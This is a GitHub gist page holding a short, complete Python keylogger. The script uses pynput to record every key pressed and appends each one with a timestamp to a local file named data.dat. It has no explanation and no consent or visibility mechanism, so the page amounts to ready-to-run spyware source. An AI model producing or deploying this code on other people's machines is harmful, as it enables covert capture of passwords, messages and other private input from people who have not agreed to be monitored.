Skip to content

Instantly share code, notes, and snippets.

@sanket143
Created June 11, 2019 13:21
Show Gist options
  • Save sanket143/afb81a8126057337c7005128639e3ab5 to your computer and use it in GitHub Desktop.
Save sanket143/afb81a8126057337c7005128639e3ab5 to your computer and use it in GitHub Desktop.
from pynput.keyboard import Key, Listener
import logging
logging.basicConfig(filename=("data.dat"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment